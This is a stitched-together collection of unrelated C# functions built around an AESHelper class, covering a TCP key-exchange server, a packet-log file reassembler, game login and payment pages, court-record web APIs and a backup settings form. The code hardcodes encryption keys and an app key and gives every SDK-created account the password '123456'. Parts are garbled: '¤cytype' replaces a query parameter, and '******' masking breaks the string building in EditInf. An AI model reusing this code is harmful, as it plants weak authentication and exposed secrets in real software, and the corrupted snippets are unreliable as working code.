private void HandleMessage(object sender, TcpClient.ReceiveEventArgs e) { this.Traffic_In += e.Data.Length; TcpClient tcpClient = sender as TcpClient; #if GZIP string text = GZip.Decompress(e.Data).GetString(); #else string text = e.Data.GetString(); #endif DataReceived?.Invoke(this, new DataReceivedEventArgs(tcpClient.RemoteAddress.Address, tcpClient.RemoteAddress.Port, text)); this.Logger.Debug($"DataReceived: {tcpClient.RemoteAddress}"); try { MessageBody message = this.JsonSerialzation.Deserialize <MessageBody>(text); if (message.Flag == MessageFlag.RequestPublicKey) { this.Logger.Debug("AKA", $"客户端 : 请求公钥 - {tcpClient.RemoteAddress}"); this.SendPublicKey(tcpClient); this.Logger.Debug("AKA", $"发送 : 服务端公钥- {tcpClient.RemoteAddress}"); } else if (message.Flag == MessageFlag.RequestValidate) { this.Logger.Debug("AKA", $"客户端 : 请求签名 - {tcpClient.RemoteAddress}"); byte[] rawData = RSAHelper.Decrypt(message.Content, this.RSAKey); if (rawData != null) { this.SendSignature(rawData, tcpClient); this.Logger.Debug("AKA", $"发送 : 服务端签名 - {tcpClient.RemoteAddress}"); } else { this.RefuseSignature(tcpClient); this.Logger.Debug("AKA", $"解析数据 : 失败 - {tcpClient.RemoteAddress}"); } } else if (message.Flag == MessageFlag.SendClientPublicKey) { this.Logger.Debug("AKA", $"接受 : 客户端公钥 - {tcpClient.RemoteAddress}"); this.Logger.Debug("AKA", $"生成 : AES密钥 - {tcpClient.RemoteAddress}"); this.GenerateAndSendAESKey(message.Content, tcpClient); this.Logger.Debug("AKA", $"发送 : AES密钥 - {tcpClient.RemoteAddress}"); } else if (message.Flag == MessageFlag.Message) { if (!string.IsNullOrWhiteSpace(message.Guid) && this.AESKeyList.ContainsKey(message.Guid)) { AESKey key = this.AESKeyList[message.Guid]; CallBody call = message.Content != null?this.JsonSerialzation.Deserialize <CallBody>(AESHelper.Decrypt(message.Content, key).GetString()) : null; if (this.UserList.ContainsKey(message.Guid)) { IServerUser user = this.UserList[message.Guid]; user.RefreshHeartBeat(); this.Logger.Debug($"RefreshHeartBeat: {user.Name} / {user.Guid}"); if (call != null) { ThreadPool.QueueUserWorkItem((x) => { var tuple = x as Tuple <Server <TConfig>, CallBody, ICaller>; tuple.Item1.CallFunction(tuple.Item2.Call, tuple.Item2.Args, tuple.Item3); }, new Tuple <Server <TConfig>, CallBody, ICaller>(this, call, user)); } } else { //新登录 if (call == null) { return; } if (call.Call == "login") { this.Logger.Debug($"尝试登入 - {tcpClient.RemoteAddress.Address}"); ServerUser user = new ServerUser() { Guid = message.Guid, Server = this, Name = null, NetAddress = tcpClient.RemoteAddress, AESKey = this.AESKeyList[message.Guid] }; if (ClientPreLogin != null) { ClientPreLoginEventArgs <ServerUser> eventArgs = new ClientPreLoginEventArgs <ServerUser>(ref user, call.Args); ClientPreLogin?.Invoke(this, eventArgs); user = eventArgs.User; } if (user != null) { user._TcpClient = tcpClient; if (user.Status == UserStatus.Online) { user.LoginTime = DateTime.Now; user.SocketError += (x, y) => { this.Logger.Error("SocketError", y.Exception.Message); ForceLogout(this.UserList[y.Guid]); }; user.RefreshHeartBeat(); this.UserList.Add(user.Guid, user); Arguments args = new Arguments(); args.Put("status", true); args.Put("guid", user.Guid); args.Put("name", user.Name); user.CallFunction("login", args); ClientLogin?.Invoke(this, new ClientEventArgs <IServerUser>(user, ClientLoginStatus.Success)); this.Logger.Debug($"登入成功 - {tcpClient.RemoteAddress.Address}"); } else if (user.Status == UserStatus.Offline) { Arguments args = new Arguments(); args.Put("status", false); ClientLogin?.Invoke(this, new ClientEventArgs <IServerUser>(user, ClientLoginStatus.Fail)); user.CallFunction("login", args); this.Logger.Error($"登入失败 - {tcpClient.RemoteAddress.Address}"); } } } } } } } catch (Exception ex) { this.Logger.Error(ex.Message); } }
public override bool Run() { if (!File.Exists) { return(false); } if (!OutFolder.Exists) { return(false); } AESHelper aes = AESHelper.Create(this); if (aes != null) { WriteInfo("Using AES Encryption"); } else { WriteError("Read in RawMode (without any Encryption)"); } WriteInfo("Start reading file ..."); Dictionary <string, List <packet> > dic = new Dictionary <string, List <packet> >(); using (Stream fs = (Stream)File.OpenRead()) using (StreamReader sr = new StreamReader(fs)) { string line; while ((line = sr.ReadLine()) != null) { string fileId; packet packet; if (!parse(line, out fileId, out packet)) { continue; } if (dic.ContainsKey(fileId)) { dic[fileId].Add(packet); } else { List <packet> pc = new List <packet>(); pc.Add(packet); dic.Add(fileId, pc); } } } WriteInfo("Located " + dic.Keys.Count.ToString() + (dic.Keys.Count == 1 ? " file" : " files")); if (dic.Keys.Count > 0) { WriteInfo("Reordering packets ..."); foreach (string k in dic.Keys) { List <packet> p = dic[k]; p.Sort(sortPacket); } WriteInfo("Dump files ..."); foreach (string k in dic.Keys) { List <packet> lp = dic[k]; string path = OutFolder + System.IO.Path.DirectorySeparatorChar.ToString() + k + ".dat"; using (MemoryStream ms = new MemoryStream()) { foreach (packet p in lp) { ms.Write(p.Data, 0, p.Data.Length); } if (aes != null) { byte[] d = aes.Decrypt(ms.ToArray()); if (d == null) { WriteError("Error in decrypt process"); continue; } System.IO.File.WriteAllBytes(path, d); } else { System.IO.File.WriteAllBytes(path, ms.ToArray()); } WriteInfo("Created file '" + path + "'", new FileInfo(path).Length.ToString(), ConsoleColor.Green); } } } return(true); }
protected void Page_Load(object sender, EventArgs e) { NameValueCollection req = Request.Form; string args = ""; foreach (string key in req.AllKeys) { args += key + "=" + req[key] + "&"; } args = args.Substring(0, args.Length - 1); LoginInfo loginInfo = null; try { loginInfo = JsonHelper.ParseFromStr <LoginInfo>(req["server_ext_for_login"]); } catch (Exception ex) { } string msg = ""; try { Uri uri = new Uri(login); HttpWebRequest requester = WebRequest.Create(uri) as HttpWebRequest; requester.Method = "POST"; requester.Timeout = 3000; byte[] bs = Encoding.UTF8.GetBytes(args); requester.ContentType = "application/x-www-form-urlencoded"; requester.ContentLength = bs.Length; using (Stream reqStream = requester.GetRequestStream()) { reqStream.Write(bs, 0, bs.Length); } HttpWebResponse responser = requester.GetResponse() as HttpWebResponse; StreamReader reader = new StreamReader(responser.GetResponseStream(), Encoding.UTF8); msg = reader.ReadToEnd(); JavaScriptSerializer serializer = new JavaScriptSerializer(); Dictionary <string, object> rets = serializer.Deserialize <Dictionary <string, object> >(msg); if (rets["status"].ToString() == "ok") { //因为支付而调用SDK登录,记录数据 bool isPayLogin = false; Dictionary <string, object> savedata = (Dictionary <string, object>)rets["common"]; if (savedata.ContainsKey("server_id")) { if (savedata["server_id"].ToString() == "payLogin") { isPayLogin = true; } } if (loginInfo != null && loginInfo.isPayLogin.Equals("true")) { isPayLogin = true; } if (!isPayLogin) { Random rd = new Random(); DateTime now = DateTime.Now; int randkey = rd.Next(); savedata["randkey"] = randkey; savedata["lasttime"] = now.Ticks; savedata["ip"] = Request.ServerVariables.Get("Remote_Addr").ToString(); string clientkey = randkey.ToString() + ":" + now.Ticks.ToString(); rets["ext"] = AESHelper.AESEncrypt(clientkey, AES_KEY); string channelID = savedata["channel"].ToString(); string tempacc = savedata["channel"].ToString() + "_" + savedata["uid"].ToString(); if (MongodbAccount.Instance.KeyExistsBykey("anysdk_login", "acc", tempacc) == false) { Dictionary <string, object> savelog = new Dictionary <string, object>(); savelog["acc"] = tempacc; savelog["acc_real"] = tempacc; savelog["ip"] = Request.ServerVariables.Get("Remote_Addr").ToString(); savelog["time"] = now; savelog["channel"] = channelID; MongodbAccount.Instance.ExecuteInsert("RegisterLog", savelog); } msg = MongodbAccount.Instance.ExecuteStoreBykey("anysdk_login", "acc", tempacc, savedata); if (msg == "") { msg = serializer.Serialize(rets); Dictionary <string, object> savelog = new Dictionary <string, object>(); savelog["acc"] = tempacc; savelog["acc_real"] = tempacc; if (loginInfo != null && !string.IsNullOrEmpty(loginInfo.deviceID)) { savelog["acc_dev"] = loginInfo.deviceID; } savelog["ip"] = Request.ServerVariables.Get("Remote_Addr").ToString(); savelog["time"] = now; savelog["channel"] = channelID; MongodbAccount.Instance.ExecuteInsert("LoginLog", savelog); } } } } catch (Exception ex) { msg = ex.Message; } Response.Write(msg); }
public string EditInf(UserInf v) { if (v.Token == DataHelper.getToken()) { string wramStr = ""; if (string.IsNullOrEmpty(v.OldPassword)) { wramStr = "旧密码不能为空"; return(ConvertHelper.resultJson(0, wramStr)); } else if (string.IsNullOrEmpty(v.NewPassword)) { wramStr = "新密码不能为空"; return(ConvertHelper.resultJson(0, wramStr)); } else { string p = ""; p += "UserName="******"OldPassword="******"NewPassword="******"select count(*) from T_UserInf where UserName=@UserName and UPassword=@UPassword"; SqlParameter[] pms1 = new SqlParameter[] { new SqlParameter("@UPassword", SqlDbType.NVarChar) { Value = (oldPwd) }, new SqlParameter("@UserName", SqlDbType.NVarChar) { Value = (username) } }; try { object c = SQLHelper.ExecuteScalar(sql1, System.Data.CommandType.Text, pms1); if (Convert.ToInt32(c) > 0) { string sql2 = "update T_UserInf set UPassword=@UPassword"; sql2 += " where UserName=@UserName"; SqlParameter[] pms2 = new SqlParameter[] { new SqlParameter("@UPassword", SqlDbType.NVarChar) { Value = pwd }, new SqlParameter("@UserName", SqlDbType.NVarChar) { Value = username } }; try { int result = SQLHelper.ExecuteNonQuery(sql2, System.Data.CommandType.Text, pms2); return(ConvertHelper.IntToJson(result)); } catch (Exception e) { //在webapi中要想抛出异常必须这样抛出,否则之抛出一个默认500的异常 var resp = new HttpResponseMessage(HttpStatusCode.InternalServerError) { Content = new StringContent(e.ToString()), ReasonPhrase = "error" }; throw new HttpResponseException(resp); } } else { return(ConvertHelper.resultJson(0, "旧密码不正确!")); } } catch (Exception e) { //在webapi中要想抛出异常必须这样抛出,否则之抛出一个默认500的异常 var resp = new HttpResponseMessage(HttpStatusCode.InternalServerError) { Content = new StringContent(e.ToString()), ReasonPhrase = "error" }; throw new HttpResponseException(resp); } //string sql = "insert into T_VisitorAccessInf(VName, VSex, VNation, VBirthDate, VAddress, VIssuingAuthority, VExpiryDate, VCertificatePhoto, VLocalePhoto, VCertificateType, VCertificateNumber, VType, VFromCourtId, VInTime, VOutTime, VInPost, VOutPost, VInDoorkeeper, VOutDoorkeeper, VVisitingReason, VIntervieweeDept, VInterviewee, VOffice, VOfficePhone, VExtensionPhone, VMobilePhone, VRemark) values(@VName, @VSex, @VNation, @VBirthDate, @VAddress, @VIssuingAuthority, @VExpiryDate, @VCertificatePhoto, @VLocalePhoto, @VCertificateType, @VCertificateNumber, @VType, @VFromCourtId, @VInTime, @VOutTime, @VInPost, @VOutPost, @VInDoorkeeper, @VOutDoorkeeper, @VVisitingReason, @VIntervieweeDept, @VInterviewee, @VOffice, @VOfficePhone, @VExtensionPhone, @VMobilePhone, @VRemark)"; } else { return(ConvertHelper.resultJson(0, "数据在传输过程中被篡改!")); } } } else { return(ConvertHelper.resultJson(0, "权限受限!")); } }
protected void Page_Load(object sender, EventArgs e) { string platform = Request.Form["platform"]; string acc = Request.Form["acc"]; string logintime = Request.Form["logintime"]; string sign = Request.Form["sign"]; string loginkey = Request.Form["loginkey"]; if (string.IsNullOrEmpty(platform)) { Response.Write(Helper.buildLuaReturn(-1, "platform is empty")); return; } if (string.IsNullOrEmpty(acc)) { Response.Write(Helper.buildLuaReturn(-1, "acc is empty")); return; } if (string.IsNullOrEmpty(logintime)) { Response.Write(Helper.buildLuaReturn(-1, "logintime is empty")); return; } if (string.IsNullOrEmpty(sign)) { Response.Write(Helper.buildLuaReturn(-1, "sign is empty")); return; } if (string.IsNullOrEmpty(loginkey)) { Response.Write(Helper.buildLuaReturn(-1, "loginkey is empty")); return; } string rsakey = Encoding.Default.GetString(Convert.FromBase64String(loginkey)); rsakey = AESHelper.AESDecrypt(rsakey, AES_KEY); string source = string.Format("username={0}&appkey=3f2fadb37dd503fe686cdfb33ab8c095&logintime={1}", acc, logintime); if (Helper.checkMD5(source, sign)) { string acc_table = "wanke_acc"; string pwd = Helper.getMD5("123456"); //判断是否存在帐号 if (MongodbAccount.Instance.KeyExistsBykey(acc_table, "acc", acc)) { //检测帐号是否能登陆 int retCode = tryLogin(acc, pwd, acc_table); if (retCode == 0) { Random rd = new Random(); int randkey = rd.Next(); Dictionary <string, object> updata = new Dictionary <string, object>(); DateTime now = DateTime.Now; updata["randkey"] = randkey; updata["lasttime"] = now.Ticks; updata["lastip"] = Request.ServerVariables.Get("Remote_Addr").ToString(); string strerr = MongodbAccount.Instance.ExecuteUpdate(acc_table, "acc", acc, updata); if (strerr != "") { Response.Write(BuildAccount.buildLuaReturn(-11, "server error")); } else { RSAHelper rsa = new RSAHelper(); rsa.setModulus(rsakey); string clientkey = randkey.ToString() + ":" + now.Ticks.ToString(); Response.Write(BuildAccount.buildLuaReturn(0, AESHelper.AESEncrypt(clientkey, AES_KEY))); Dictionary <string, object> savelog = new Dictionary <string, object>(); savelog["acc"] = acc; savelog["acc_real"] = acc; string deviceID = Request.Params["deviceID"]; if (!string.IsNullOrEmpty(deviceID)) { savelog["acc_dev"] = deviceID; } savelog["ip"] = Request.ServerVariables.Get("Remote_Addr").ToString(); savelog["time"] = now; MongodbAccount.Instance.ExecuteInsert("LoginLog", savelog); } } else { Response.Write(BuildAccount.buildLuaReturn(retCode, "acc error")); } } else { //注册新帐号 Random rd = new Random(); int randkey = rd.Next(); Dictionary <string, object> updata = new Dictionary <string, object>(); updata["acc"] = acc; updata["pwd"] = pwd; DateTime now = DateTime.Now; updata["randkey"] = randkey; updata["lasttime"] = now.Ticks; updata["regedittime"] = now; updata["regeditip"] = Request.ServerVariables.Get("Remote_Addr").ToString(); updata["updatepwd"] = false; updata["platform"] = platform; string strerr = MongodbAccount.Instance.ExecuteStoreBykey(acc_table, "acc", acc, updata); if (strerr != "") { Response.Write(BuildAccount.buildLuaReturn(-11, "server error")); } else { RSAHelper rsa = new RSAHelper(); rsa.setModulus(rsakey); string clientkey = randkey.ToString() + ":" + now.Ticks.ToString(); Response.Write(BuildAccount.buildLuaReturn(0, AESHelper.AESEncrypt(clientkey, AES_KEY))); Dictionary <string, object> savelog = new Dictionary <string, object>(); savelog["acc"] = acc; savelog["acc_real"] = acc; string deviceID = Request.Params["deviceID"]; if (!string.IsNullOrEmpty(deviceID)) { savelog["acc_dev"] = deviceID; } savelog["ip"] = Request.ServerVariables.Get("Remote_Addr").ToString(); savelog["time"] = now; MongodbAccount.Instance.ExecuteInsert("LoginLog", savelog); } } } else { Response.Write(Helper.buildLuaReturn(-2, "sign is error")); return; } }
public string AddInf4Web(CourtInf v) { string wramStr = ""; if (v.CNumber == "" || v.CNumber == null) { wramStr = "法院编号不能为空"; return("{\"code\":0,\"msg\":\"" + wramStr + "\"}"); } if (v.CName == "" || v.CName == null) { wramStr = "法院名称不能为空"; return("{\"code\":0,\"msg\":\"" + wramStr + "\"}"); } if (v.CLinkman == "" || v.CLinkman == null) { wramStr = "联系人不能为空"; return("{\"code\":0,\"msg\":\"" + wramStr + "\"}"); } if (v.CWorkTelephone == "" || v.CWorkTelephone == null) { wramStr = "单位电话不能为空"; return("{\"code\":0,\"msg\":\"" + wramStr + "\"}"); } string linkman = v.CLinkman.Replace(" ", "+"); string workTelephone = v.CWorkTelephone.Replace(" ", "+"); string p = ""; p += "CNumber=" + v.CNumber; p += "&CName=" + v.CName; p += "&CLinkman=" + linkman; p += "&CWorkTelephone=" + workTelephone; p += "&CAddress=" + v.CAddress; p += "&CLongitude=" + v.CLongitude; p += "&CLatitude=" + v.CLatitude; string md5Ciphertext = v.CMD5Ciphertext;//对方传过来的所有字段的MD5密文 //把传过来的信息再次MD5加密,和所有字段的MD5密文进行比对,保证数据在传输过程中没被修改才允许添加到数据库 string md5P = MD5Helper._md5(p); if (md5Ciphertext == md5P) { string sql = "insert into T_CourtInf(CNumber, CName, CLinkman, CWorkTelephone, CAddress, CLongitude, CLatitude) values(@CNumber, @CName, @CLinkman, @WorkTelephone, @CAddress, @CLongitude, @CLatitude)"; workTelephone = RSAHelper.DecryptWithPrivateKey(privateKey, workTelephone); SqlParameter[] pms = new SqlParameter[] { new SqlParameter("@CNumber", SqlDbType.NVarChar) { Value = v.CNumber }, new SqlParameter("@CName", SqlDbType.NVarChar) { Value = v.CName }, new SqlParameter("@CLinkman", SqlDbType.NVarChar) { Value = AESHelper.AesDecrypt(linkman) }, new SqlParameter("@CWorkTelephone", SqlDbType.NVarChar) { Value = AESHelper.AesDecrypt(workTelephone) }, new SqlParameter("@CAddress", SqlDbType.NVarChar) { Value = DataHelper.IsNullReturnLine(v.CAddress) }, new SqlParameter("@CLongitude", SqlDbType.NVarChar) { Value = DataHelper.IsNullReturnLine(v.CLongitude) }, new SqlParameter("@CLatitude", SqlDbType.NVarChar) { Value = DataHelper.IsNullReturnLine(v.CLatitude) } }; try { int result = SQLHelper.ExecuteNonQuery(sql, System.Data.CommandType.StoredProcedure, pms); return(ConvertHelper.IntToJson(result)); } catch (Exception e) { //在webapi中要想抛出异常必须这样抛出,否则只抛出一个默认500的异常 var resp = new HttpResponseMessage(HttpStatusCode.InternalServerError) { Content = new StringContent(e.ToString()), ReasonPhrase = "error" }; throw new HttpResponseException(resp); } } else { return(ConvertHelper.resultJson(0, "数据传输过程中被篡改")); } }
private void buttonSave_Click(object sender, EventArgs e) { if (comboBoxDatabase.SelectedItem == null) { MessageBox.Show("未输入数据库名"); return; } if (textBoxDbUser.Text == "") { MessageBox.Show("未输入数据库用户名"); return; } if (comboBoxDatabase.SelectedItem.ToString() == "") { MessageBox.Show("未输入数据库"); return; } AppSetingHelper.UpdateAppString("DatabaseName", AESHelper.AESEncrypt(GlobleVariable.DatabaseName, "adsfadsfadfadsfasasdfads")); AppSetingHelper.UpdateAppString("DatabaseUser", AESHelper.AESEncrypt(GlobleVariable.DatabaseUser, "adsfadsfadfadsfasasdfads")); AppSetingHelper.UpdateAppString("DatabasePassword", AESHelper.AESEncrypt(GlobleVariable.DatabasePassword, "adsfadsfadfadsfasasdfads")); AppSetingHelper.UpdateAppString("LocalKeepDay", "-" + numericUpDownLocalKeepDay.Value.ToString()); AppSetingHelper.UpdateAppString("BackupTime", numericUpDownBackupTime.Value.ToString()); AppSetingHelper.UpdateAppString("RunTime", "1"); GlobleVariable.LocalKeeyDay = -1 * (int)numericUpDownLocalKeepDay.Value; string outFangyouClient, outFangyouVer; GetFangyouInfo(out outFangyouVer, out outFangyouClient); GlobleVariable.FangyouClient = outFangyouClient; GlobleVariable.FangyouVer = outFangyouVer; AppSetingHelper.UpdateAppString("FangyouVer", outFangyouVer); AppSetingHelper.UpdateAppString("FangyouClient", outFangyouClient); var sqlBase = new SqlBase(); GlobleVariable.SqlServerType = sqlBase.GetSqlVersion(); AppSetingHelper.UpdateAppString("SqlType", GlobleVariable.SqlServerType.ToString()); AppSetingHelper.UpdateAppString("LocalKeeyDay", GlobleVariable.LocalKeeyDay.ToString()); var result = MessageBox.Show("是否立即执行备份工作?", "提示", MessageBoxButtons.YesNo); if (result == DialogResult.Yes) { var checkSql = new SqlBase(); GlobleVariable.Progress = true; switch (checkSql.GetSqlVersion()) { case SqlTypeEnum.Sql2000: var backup2000 = new Sql2000(); backup2000.Backup(); break; case SqlTypeEnum.Sql2005: var backup2005 = new Sql2005(); backup2005.Backup(); break; case SqlTypeEnum.Sql2008: var backup2008 = new Sql2008(); backup2008.Backup(); break; } } this.Close(); }
protected void Page_Load(object sender, EventArgs e) { NameValueCollection req = Request.QueryString; if (req.Count <= 0) { Response.Write("param error"); return; } Dictionary <string, object> data = new Dictionary <string, object>(); foreach (string key in req) { data[key] = req[key]; } if (!data.ContainsKey("orderid") || !data.ContainsKey("userid") || !data.ContainsKey("currencytype") || !data.ContainsKey("currencycount") || !data.ContainsKey("vipexp") || !data.ContainsKey("sign")) { Response.Write("param error"); return; } string url = "orderid=" + data["orderid"].ToString() + "&userid=" + data["userid"].ToString() + "¤cytype=" + data["currencytype"].ToString() + "¤cycount=" + data["currencycount"].ToString() + "&vipexp=" + data["vipexp"].ToString(); string checkmd5 = url + "&secretKey=" + secretKey; checkmd5 = AESHelper.MD5Encrypt(checkmd5); if (checkmd5 != data["sign"].ToString()) { Response.Write("check error"); return; } if (MongodbPayment.Instance.KeyExistsBykey("th_pay", "orderid", data["orderid"].ToString())) { Response.Write("orderid exist"); return; } data["PayTime"] = DateTime.Now; data["Process"] = false; data.Remove("sign"); if (!MongodbPayment.Instance.ExecuteInsert("th_pay", data)) { Response.Write("db error"); return; } string server_api = "http://" + ConfigurationManager.AppSettings["server_api"].ToString() + "/cmd=1&" + url; try { var ret = HttpPost.Post(new Uri(server_api)); if (ret != null) { string retstr = Encoding.UTF8.GetString(ret); Response.Write(retstr); return; } } catch (Exception) { //投递失败 玩家下次登录可以检测充值 } Response.Write("success"); }
public EncryptVerifyService(UserService serUser, IOptions <ApplicationSettings> appSettings, AESHelper aesHelper) { _appSettings = appSettings.Value; _serUser = serUser; _aesHelper = aesHelper; }
string encryptUrl(string src) { string dec = AESHelper.AESEncrypt(src, AES_KEY); return(Convert.ToBase64String(Encoding.Default.GetBytes(dec))); }
internal static string Encrypt(string imei, string url, string userAgent, double lng, double lat) { url = url.ToLower().Trim(); userAgent = userAgent.ToLower().Trim(); int num = (int)(lng * 10000000.0); int num2 = (int)(lat * 10000000.0); string str = string.Format("{0}{1}{2}", url, num, num2); string str2 = string.Format("{0}{1}{2}", userAgent, num, num2); int num3 = Math.Abs(GetHashCode2(str)); int num4 = Math.Abs(GetHashCode2(str2)); DateTime time = _init_time.AddSeconds((double)-num3); TimeSpan span = (TimeSpan)(DateTime.Now - time); long totalMilliseconds = (long)span.TotalMilliseconds; byte[] buffer = LongToByteArray(totalMilliseconds, true); byte[] buffer2 = imei.HexToBinary(); int length = buffer2.Length; int key = num3 % length; byte[] buffer3 = new byte[] { buffer[0], buffer[1], buffer[2] }; KeyValuePair <int, byte[]> pair = new KeyValuePair <int, byte[]>(key, buffer3); int num8 = num4 % length; byte[] buffer4 = new byte[] { buffer[3], buffer[4], buffer[5] }; KeyValuePair <int, byte[]> pair2 = new KeyValuePair <int, byte[]>(num8, buffer4); int num9 = 2; byte[] bytes = new byte[length + 6]; KeyValuePair <int, byte[]>[] pairArray = new KeyValuePair <int, byte[]> [num9]; if (key <= num8) { pairArray[0] = pair; pairArray[1] = pair2; } else { pairArray[0] = pair2; pairArray[1] = pair; } int index = 0; int num11 = 0; for (int i = 0; i < num9; i++) { int num13 = pairArray[i].Key; byte[] buffer6 = pairArray[i].Value; int num14 = num13 - num11; if (num14 != 0) { for (int m = 0; m < num14; m++) { bytes[index] = buffer2[num11]; num11++; index++; } } for (int k = 0; k < buffer6.Length; k++) { bytes[index] = buffer6[k]; index++; } } int num17 = length - num11; for (int j = 0; j < num17; j++) { bytes[index] = buffer2[num11]; num11++; index++; } return(AESHelper.EncryptBytes(bytes, _aes_key, _aes_iv).BinaryToHex()); }
internal static RequestImeiDto Decrypt(string encryptedImei, string url, string userAgent, double lng, double lat) { RequestImeiDto dto = new RequestImeiDto(encryptedImei); try { if (string.IsNullOrEmpty(encryptedImei)) { dto.IsFake = true; return(dto); } byte[] src = null; src = AESHelper.DecryptBytes(encryptedImei.HexToBinary(), _aes_key, _aes_iv); url = (url == null) ? "" : url.ToLower().Trim(); userAgent = (userAgent == null) ? "" : userAgent.ToLower().Trim(); int num = (int)(lng * 10000000.0); int num2 = (int)(lat * 10000000.0); string str = string.Format("{0}{1}{2}", url, num, num2); string str2 = string.Format("{0}{1}{2}", userAgent, num, num2); int num3 = Math.Abs(GetHashCode2(str)); int num4 = Math.Abs(GetHashCode2(str2)); DateTime time = _init_time.AddSeconds((double)-num3); int length = src.Length; int num6 = length - 6; int key = num3 % num6; int num8 = num4 % num6; int num9 = 2; byte[] dst = new byte[8]; byte[] buffer3 = new byte[num6]; KeyValuePair <int, int>[] pairArray = new KeyValuePair <int, int> [2]; if (key <= num8) { pairArray[0] = new KeyValuePair <int, int>(key, 0); pairArray[1] = new KeyValuePair <int, int>(num8, 1); } else { pairArray[0] = new KeyValuePair <int, int>(num8, 1); pairArray[1] = new KeyValuePair <int, int>(key, 0); } int srcOffset = 0; int dstOffset = 0; for (int i = 0; i < num9; i++) { int num13 = pairArray[i].Key + (i * 3); int num14 = pairArray[i].Value; int num15 = num13 - srcOffset; if (num15 != 0) { Buffer.BlockCopy(src, srcOffset, buffer3, dstOffset, num15); dstOffset += num15; srcOffset += num15; } Buffer.BlockCopy(src, num13, dst, num14 * 3, 3); srcOffset += 3; } int count = length - srcOffset; if (count != 0) { Buffer.BlockCopy(src, srcOffset, buffer3, dstOffset, count); } long num17 = BitConverter.ToInt64(dst, 0); dto.GenerateTime = new DateTime?(time.AddMilliseconds((double)num17).ToLocalTime()); dto.RealImei = buffer3.BinaryToHex(); dto.IsFake = false; return(dto); } catch { dto.IsFake = true; return(dto); } }
protected void Page_Load(object sender, EventArgs e) { try { string platform = Request.Form["platform"]; string deviceID = Request.Form["DeviceID"]; string loginkey = Request.Form["loginkey"]; if (string.IsNullOrEmpty(platform)) { Response.Write(Helper.buildLuaReturn(-1, "platform is empty")); return; } if (string.IsNullOrEmpty(loginkey)) { Response.Write(Helper.buildLuaReturn(-1, "loginkey is empty")); return; } if (string.IsNullOrEmpty(deviceID)) { deviceID = ""; } string dataStr = Encoding.Default.GetString(Convert.FromBase64String(loginkey)); dataStr = AESHelper.AESDecrypt(dataStr, AES_KEY); string[] data = dataStr.Split(':'); if (data.Length < 3) { Response.Write(BuildAccount.buildLuaReturn(-2, "data error")); return; } string acc = data[0]; string pwd = data[1]; string rsakey = data[2]; //帐号表 string acc_table = "thdwc_acc"; //判断是否存在帐号 if (MongodbAccount.Instance.KeyExistsBykey(acc_table, "acc", acc)) { //检测帐号是否能登陆 int retCode = tryLogin(acc, pwd, acc_table); if (retCode == 0) { Random rd = new Random(); int randkey = rd.Next(); Dictionary <string, object> updata = new Dictionary <string, object>(); DateTime now = DateTime.Now; updata["randkey"] = randkey; updata["lasttime"] = now.Ticks; updata["lastip"] = Request.ServerVariables.Get("Remote_Addr").ToString(); string strerr = MongodbAccount.Instance.ExecuteUpdate(acc_table, "acc", acc, updata); if (strerr != "") { Response.Write(BuildAccount.buildLuaReturn(-11, "server error")); } else { RSAHelper rsa = new RSAHelper(); rsa.setModulus(rsakey); string clientkey = randkey.ToString() + ":" + now.Ticks.ToString(); Response.Write(BuildAccount.buildLuaReturn(0, AESHelper.AESEncrypt(clientkey, AES_KEY))); Dictionary <string, object> savelog = new Dictionary <string, object>(); savelog["acc"] = acc; savelog["ip"] = Request.ServerVariables.Get("Remote_Addr").ToString(); savelog["time"] = now; savelog["DeviceID"] = deviceID; MongodbAccount.Instance.ExecuteInsert("LoginLog", savelog); } } else { Response.Write(BuildAccount.buildLuaReturn(retCode, "acc error")); } } else { //注册新帐号 Random rd = new Random(); int randkey = rd.Next(); Dictionary <string, object> updata = new Dictionary <string, object>(); updata["acc"] = acc; updata["pwd"] = pwd; DateTime now = DateTime.Now; updata["randkey"] = randkey; updata["lasttime"] = now.Ticks; updata["regedittime"] = now; updata["regeditip"] = Request.ServerVariables.Get("Remote_Addr").ToString(); updata["updatepwd"] = false; updata["platform"] = platform; string strerr = MongodbAccount.Instance.ExecuteStoreBykey(acc_table, "acc", acc, updata); if (strerr != "") { Response.Write(BuildAccount.buildLuaReturn(-11, "server error")); } else { RSAHelper rsa = new RSAHelper(); rsa.setModulus(rsakey); string clientkey = randkey.ToString() + ":" + now.Ticks.ToString(); Response.Write(BuildAccount.buildLuaReturn(0, AESHelper.AESEncrypt(clientkey, AES_KEY))); Dictionary <string, object> savelog = new Dictionary <string, object>(); savelog["acc"] = acc; savelog["ip"] = Request.ServerVariables.Get("Remote_Addr").ToString(); savelog["time"] = now; savelog["DeviceID"] = deviceID; MongodbAccount.Instance.ExecuteInsert("LoginLog", savelog); } } } catch (Exception ex) { Response.Write(BuildAccount.buildLuaReturn(-1, ex.Message)); } }
public override bool Run() { if (!File.Exists) return false; if (!OutFolder.Exists) return false; AESHelper aes = null; if (AESHelper.IsConfigured(this)) { aes = new AESHelper(this); WriteInfo("Using AES Encryption"); } else WriteError("Read in RawMode"); WriteInfo("Start reading file ..."); Dictionary<string, List<packet>> dic = new Dictionary<string, List<packet>>(); using (Stream fs = (Stream)File.OpenRead()) using (StreamReader sr = new StreamReader(fs)) { string line; while ((line = sr.ReadLine()) != null) { string fileId; packet packet; if (!parse(line, out fileId, out packet)) continue; if (dic.ContainsKey(fileId)) { dic[fileId].Add(packet); } else { List<packet> pc = new List<packet>(); pc.Add(packet); dic.Add(fileId, pc); } } } WriteInfo("Located " + dic.Keys.Count.ToString() + (dic.Keys.Count == 1 ? " file" : " files")); if (dic.Keys.Count > 0) { WriteInfo("Reordering packets ..."); foreach (string k in dic.Keys) { List<packet> p = dic[k]; p.Sort(sortPacket); } WriteInfo("Dump files ..."); foreach (string k in dic.Keys) { List<packet> lp = dic[k]; string path = OutFolder + System.IO.Path.DirectorySeparatorChar.ToString() + k + ".dat"; using (MemoryStream ms = new MemoryStream()) { foreach (packet p in lp) ms.Write(p.Data, 0, p.Data.Length); if (aes != null) { byte[] d = aes.Decrypt(ms.ToArray()); if (d == null) { WriteError("Error in decrypt process"); continue; } System.IO.File.WriteAllBytes(path, d); } else { System.IO.File.WriteAllBytes(path, ms.ToArray()); } WriteInfo("Created file '" + path + "'", new FileInfo(path).Length.ToString(), ConsoleColor.Green); } } } return true; }
